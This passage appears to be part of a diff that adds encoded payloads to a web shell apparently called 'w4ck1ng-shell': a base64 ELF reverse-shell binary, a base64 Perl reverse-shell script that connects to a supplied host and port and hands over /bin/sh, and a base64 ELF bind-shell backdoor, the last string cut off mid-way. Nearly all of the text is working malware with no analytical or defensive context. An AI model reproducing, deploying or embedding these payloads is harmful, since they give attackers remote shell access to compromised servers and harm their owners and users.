+$back_connect_c="f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAA2IUECDQAAABMDAAAAAAAADQAIAAHACgAHAAZAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQILAkAACwJAAAFAAAAABAAAAEAAAAsCQAALJkECCyZBAg4AQAAPAEAAAYAAAAAEAAAAgAAAEAJAABAmQQIQJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAABQAAABEAAAAUAAAAAAAAAAAAAAARAAAAEgAAAAcAAAAKAAAACwAAAAgAAAAPAAAAAwAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAAABgAAAAAAAAABAAAAAAAAAAkAAAAAAAAADAAAAAAAAAAAAAAADQAAAA4AAAACAAAABAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAAAAAABwBAAASAAAArAAAAAAAAABxAAAAEgAAADwAAAAAAAAACwIAABIAAABIAAAAAAAAAH0AAAASAAAAjAAAAAAAAACsAQAAEgAAAKUAAAAAAAAArwAAABIAAABjAAAAAAAAACcAAAASAAAAkwAAAAAAAADdAAAAEgAAAEMAAAAAAAAAOgAAABIAAABcAAAAAAAAAKoBAAASAAAAVgAAAAAAAAA2AAAAEgAAAHMAAAAAAAAA2QAAABIAAAB4AAAAAAAAACgAAAASAAAAbQAAAAAAAAAOAAAAEgAAAC4AAAAAAAAAeAAAABIAAAB9AAAA8IgECAQAAAARAA4ATwAAAAAAAAA5AAAAEgAAAAEAAAAAAAAAAAAAACAAAAAVAAAAAAAAAAAAAAAgAAAAAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19nbW9uX3N0YXJ0X18AbGliYy5zby42AGNvbm5lY3QAZXhlY2wAcGVycm9yAGR1cDIAc3lzdGVtAHNvY2tldABiemVybwBzdHJjYXQAaW5ldF9hZGRyAGh0b25zAGV4aXQAYXRvaQBfSU9fc3RkaW5fdXNlZABkYWVtb24AX19saWJjX3N0YXJ0X21haW4Ac3RybGVuAGNsb3NlAEdMSUJDXzIuMAAAAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAEAAgAAAAAAAQABACQAAAAQAAAAAAAAABBpaQ0AAAIAsgAAAAAAAAAImgQIBhMAABiaBAgHAQAAHJoECAcCAAAgmgQIBwMAACSaBAgHBAAAKJoECAcFAAAsmgQIBwYAADCaBAgHBwAANJoECAcIAAA4mgQIBwkAADyaBAgHCgAAQJoECAcLAABEmgQIBwwAAEiaBAgHDQAATJoECAcOAABQmgQIBw8AAFSaBAgHEQAAVYnlg+wI6EEBAADolAEAAOjnAwAAycMA/zUQmgQI/yUUmgQIAAAAAP8lGJoECGgAAAAA6eD/////JRyaBAhoCAAAAOnQ/////yUgmgQIaBAAAADpwP////8lJJoECGgYAAAA6bD/////JSiaBAhoIAAAAOmg/////yUsmgQIaCgAAADpkP////8lMJoECGgwAAAA6YD/////JTSaBAhoOAAAAOlw/////yU4mgQIaEAAAADpYP////8lPJoECGhIAAAA6VD/////JUCaBAhoUAAAAOlA/////yVEmgQIaFgAAADpMP////8lSJoECGhgAAAA6SD/////JUyaBAhoaAAAAOkQ/////yVQmgQIaHAAAADpAP////8lVJoECGh4AAAA6fD+//8x7V6J4YPk8FBUUmhoiAQIaBSIBAhRVmiAhgQI6E/////0kJBVieVT6AAAAABbgcMHFAAAUouD/P///4XAdAL/0FhbycOQkJBVieWD7AiAPWSaBAgAdA/rH412AIPABKNgmgQI/9KhYJoECIsQhdJ168YFZJoECAHJw4n2VYnlg+wIoTyZBAiFwHQZuAAAAACFwHQQg+wMaDyZBAj/0IPEEI12AMnDkJBVieVXVlOD7EyD5PC4AAAAAIPAD4PAD8HoBMHgBCnEjX2ovvSIBAj8uQcAAADzpI19r/y5DgAAALAA86qD7AhqAGoB6FD+//+DxBBmx0XIAgCD7AyLRQyDwAj/MOi3/v//g8QQD7fAg+wMUOi4/v//g8QQZolFyoPsDItFDIPABP8w6DH+//+D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EgAAAFwCAAAAAAAAKAAAABIAAABsAgAAZJoECAAAAAAQAPH/cwIAAAyaBAgAAAAAEQAVAIkCAABomgQIAAAAABAA8f+OAgAAAAAAAA4AAAASAAAAnwIAAAAAAAB4AAAAEgAAALICAAAsmQQIAAAAABAC8f/FAgAA8IgECAQAAAARAA4A1AIAAFiaBAgAAAAAEAAWAOECAAAAAAAAOQAAABIAAADzAgAAAAAAAAAAAAAgAAAABwMAACyZBAgAAAAAEALx/x0DAAAAAAAAAAAAACAAAAAAY2FsbF9nbW9uX3N0YXJ0AGNydHN0dWZmLmMAX19DVE9SX0xJU1RfXwBfX0RUT1JfTElTVF9fAF9fSkNSX0xJU1RfXwBwLjAAY29tcGxldGVkLjEAX19kb19nbG9iYWxfZHRvcnNfYXV4AGZyYW1lX2R1bW15AF9fQ1RPUl9FTkRfXwBfX0RUT1JfRU5EX18AX19GUkFNRV9FTkRfXwBfX0pDUl9FTkRfXwBfX2RvX2dsb2JhbF9jdG9yc19hdXgAYmFjay5jAGV4ZWNsQEBHTElCQ18yLjAAX0RZTkFNSUMAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAX19maW5pX2FycmF5X2VuZABfX2Rzb19oYW5kbGUAX19saWJjX2NzdV9maW5pAHN5c3RlbUBAR0xJQkNfMi4wAF9pbml0AGRhZW1vbkBAR0xJQkNfMi4wAF9zdGFydABzdHJsZW5AQEdMSUJDXzIuMABfX2ZpbmlfYXJyYXlfc3RhcnQAX19saWJjX2NzdV9pbml0AGluZXRfYWRkckBAR0xJQkNfMi4wAF9fYnNzX3N0YXJ0AG1haW4AX19saWJjX3N0YXJ0X21haW5AQEdMSUJDXzIuMABfX2luaXRfYXJyYXlfZW5kAGR1cDJAQEdMSUJDXzIuMABzdHJjYXRAQEdMSUJDXzIuMABkYXRhX3N0YXJ0AF9maW5pAF9fcHJlaW5pdF9hcnJheV9lbmQAYnplcm9AQEdMSUJDXzIuMABleGl0QEBHTElCQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfR0xPQkFMX09GRlNFVF9UQUJMRV8AX2VuZABodG9uc0BAR0xJQkNfMi4wAGNvbm5lY3RAQEdMSUJDXzIuMABfX2luaXRfYXJyYXlfc3RhcnQAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19wcmVpbml0X2FycmF5X3N0YXJ0AF9fZ21vbl9zdGFydF9fAA==";
+
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiOyc7DQokc3lzdGVtMT0gJ2VjaG8gImBpZGAiOyc7DQokc3lzdGVtMj0gJ2VjaG8gImBwd2RgIjsnOw0KJHN5c3RlbTM9ICdlY2hvICJgd2hvYW1pYEBgaG9zdG5hbWVgOn4gPiI7JzsNCiRzeXN0ZW00PSAnL2Jpbi9zaCc7DQokMD0kY21kOw0KJHRhcmdldD0kQVJHVlswXTsNCiRwb3J0PSRBUkdWWzFdOw0KJGlhZGRyPWluZXRfYXRvbigkdGFyZ2V0KSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQokcGFkZHI9c29ja2FkZHJfaW4oJHBvcnQsICRpYWRkcikgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHByb3RvPWdldHByb3RvYnluYW1lKCd0Y3AnKTsNCnNvY2tldChTT0NLRVQsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCmNvbm5lY3QoU09DS0VULCAkcGFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCm9wZW4oU1RESU4sICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERPVVQsICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsICI+JlNPQ0tFVCIpOw0KcHJpbnQgIlxuXG46OiB3NGNrMW5nLXNoZWxsIChQcml2YXRlIEJ1aWxkIHYwLjMpIHJldmVyc2Ugc2hlbGwgOjpcblxuIjsNCnByaW50ICJcblN5c3RlbSBJbmZvOiAiOyANCnN5c3RlbSgkc3lzdGVtKTsNCnByaW50ICJcbllvdXIgSUQ6ICI7IA0Kc3lzdGVtKCRzeXN0ZW0xKTsNCnByaW50ICJcbkN1cnJlbnQgRGlyZWN0b3J5OiAiOyANCnN5c3RlbSgkc3lzdGVtMik7DQpwcmludCAiXG4iOw0Kc3lzdGVtKCRzeXN0ZW0zKTsgc3lzdGVtKCRzeXN0ZW00KTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+
+$backdoor="f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAoIUECDQAAAD4EgAAAAAAADQAIAAHACgAIgAfAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQIrAkAAKwJAAAFAAAAABAAAAEAAACsCQAArJkECKyZBAg0AQAAOAEAAAYAAAAAEAAAAgAAAMAJAADAmQQIwJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAAAAAAABEAAAATAAAAAAAAAAAAAAAQAAAAEQAAAAAAAAAAAAAACQAAAAgAAAAFAAAAAwAAAA0AAAAAAAAAAAAAAA8AAAAKAAAAEgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAABAAAAAAAAAAcAAAALAAAAAAAAAAQAAAAMAAAADgAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC4AAAAAAAAAdQEAABIAAACgAAAAAAAAAHEAAAASAAAANAAAAAAAAADMAAAAEgAAAGoAAAAAAAAAWgAAABIAAABMAAAAAAAAAHgAAAASAAAAYwAAAAAAAAA5AAAAEgAAAFgAAAAAAAAAOQAAABIAAACOAAAAAAAAAOYAAAASAAAAOwAAAAAAAAA6AAAAEgAAAFMAAAAAAAAAOQAAABIAAAB1AAAAAAAAALkAAAASAAAAegAAAAAAAAArAAAAEgAAAEcAAAAAAAAAeAAAABIAAABvAAAAAAAAAA4AAAASAAAAfwAAAEiJBAgEAAAAEQAOAEAAAAAAAAAAOQAAABIAAAABAAAAAAAAAAAAAAAgAAAAFQAAAAAAAAAAAAAAIAAAAABfSnZfUmVnaXN0ZXJDbGFzc2VzAF9fZ21vbl9zdGFydF9fAGxpYmMuc28uNgBleGVjbABwZXJyb3IAZHVwMgBzb2NrZXQAc2VuZABhY2NlcHQAYmluZABzZXRzb2Nrb3B0AGxpc3RlbgBmb3JrAGh0b25zAGV4aXQAYXRvaQBfSU9fc3RkaW5fdXNlZABfX2xpYmNfc3RhcnRfbWFpbgBjbG9zZQBHTElCQ18yLjAAAAACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAQACAAAAAAAAAAEAAQAkAAAAEAAAAAAAAAAQaWkNAAACAKYAAAAAAAAAiJoECAYSAACYmgQIBwEAAJyaBAgHAgAAoJoECAcDAACkmgQIBwQAAKiaBAgHBQAArJoECAcGAACwmgQIBwcAALSaBAgHCAAAuJoECAcJAAC8mgQIBwoAAMCaBAgHCwAAxJoECAcMAADImgQIBw0AAMyaBAgHDgAA0JoECAcQAABVieWD7AjoMQEAAOiDAQAA6FsEAADJwwD/NZCaBAj/JZSaBAgAAAAA/yWYmgQIaAAAAADp4P////8lnJoECGgIAAAA6dD/////JaCaBAhoEAAAAOnA/////yWkmgQIaBgAAADpsP////8lqJoECGggAAAA6aD/////JayaBAhoKAAAAOmQ/////yWwmgQIaDAAAADpgP////8ltJoECGg4AAAA6XD/////JbiaBAhoQAAAAOlg/////yW8mgQIaEgAAADpUP////8lwJoECGhQAAAA6UD/////JcSaBAhoWAAAAOkw/////yXImgQIaGAAAADpIP////8lzJoECGhoAAAA6RD/////JdCaBAhocAAAAOkA////Me1eieGD5PBQVFJorYgECGhciAQIUVZoQIYECOhf////9JCQVYnlU+gbAAAAgcO/FAAAg+wEi4P8////hcB0Av/Qg8QEW13Dixwkw1WJ5YPsCIA94JoECAB0DOscg8AEo9yaBAj/0qHcmgQIixCF0nXrxgXgmgQIAcnDVYnlg+wIobyZBAiFwHQSuAAAAACFwHQJxwQkvJkECP/QycOQkFWJ5VeD7GSD5PC4AAAAAIPAD4PAD8HoBMHgBCnEx0XkAQAAAMdF+EyJBAjHRCQIAAAAAMdEJAQBAAAAxwQkAgAAAOgJ////iUXwg33wAHkYxwQkjIkECOg0/v//xwQkAQAAAOio/v//ZsdF1AIAx0XYAAAAAItFDIPABIsAiQQk6Jv+//8Pt8CJBCTosP7//2aJRdbHRCQQBAAAAI1F5IlEJAzHRCQIAgAAAMdEJAQBAAAAi0XwiQQk6BL+//+NRdTHRCQIEAAA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L2J1aWxkZC9nbGliYy0yLjMuNi9idWlsZC10cmVlL2dsaWJjLTIuMy42L2NzdQBHTlUgQVMgMi4xNi45MQABgIwAAAACAGYAAAAEAS8BAAAvYnVpbGQvYnVpbGRkL2dsaWJjLTIuMy42L2J1aWxkLXRyZWUvaTM4Ni1saWJjL2NzdS9jcnRuLlMAL2J1aWxkL2J1aWxkZC9nbGliYy0yLjMuNi9idWlsZC10cmVlL2dsaWJjLTIuMy42L2NzdQBHTlUgQVMgMi4xNi45MQABgAERABAGEQESAQMIGwglCBMFAAAAAREBEAYSAREBJQ4TCwMOGw4AAAIkAAMOCws+CwAAAyQAAwgLCz4LAAAENAADDjoLOwtJEz8MAgoAAAUmAEkTAAAAAREAEAYDCBsIJQgTBQAAAAERABAGAwgbCCUIEwUAAABXAAAAAgAyAAAAAQH7Dg0AAQEBAQAAAAEAAAEuLi9zeXNkZXBzL2kzODYvZWxmAABzdGFydC5TAAEAAAAABQKghQQIA8AAATMhND0lIgMYIFlaISJcWwIBAAEBIwAAAAIAHQAAAAEB+w4NAAEBAQEAAAABAAABAGluaXQuYwAAAAAAqQAAAAIAUAAAAAEB+w4NAAEBAQEAAAABAAABL2J1aWxkL2J1aWxkZC9nbGliYy0yLjMuNi9idWlsZC10cmVlL2kzODYtbGliYy9jc3UAAGNydGkuUwABAAAAAAUC6IUECAPAAAE9AgEAAQEABQIkiQQIAy4BIS8hWWcCAwABAQAFAoiEBAgDHwEhLz0CBQABAQAFAsSFBAgDCgEhLyFZZz1nLy8wPSEhAgEAAQGIAAAAAgBQAAAAAQH7Dg0AAQEBAQAAAAEAAAEvYnVpbGQvYnVpbGRkL2dsaWJjLTIuMy42L2J1aWxkLXRyZWUvaTM4Ni1saWJjL2NzdQAAY3J0bi5TAAEAAAAABQLohQQIAyEBPQIBAAEBAAUCO4kECAMSAT0hIQIBAAEBAAUCnYQECAMJASECAQABAWluaXQuYwBzaG9ydCBpbnQAL2J1aWxkL2J1aWxkZC9nbGliYy0yLjMuNi9idWlsZC10cmVlL2dsaWJjLTIuMy42L2NzdQBsb25nIGxvbmcgaW50AHVuc2lnbmVkIGNoYXIAR05VIEMgMy40LjYgKFVidW50dSAzLjQuNi0xdWJ1bnR1MikAbG9uZyBsb25nIHVuc2lnbmVkIGludABzaG9ydCB1bnNpZ25lZCBpbnQAX0lPX3N0ZGluX3VzZWQAAC5zeW10YWIALnN0cnRhYgAuc2hzdHJ0YWIALmludGVycAAubm90ZS5BQkktdGFnAC5oYXNoAC5keW5zeW0ALmR5bnN0cgAuZ251LnZlcnNpb24ALmdudS52ZXJzaW9uX3IALnJlbC5keW4ALnJlb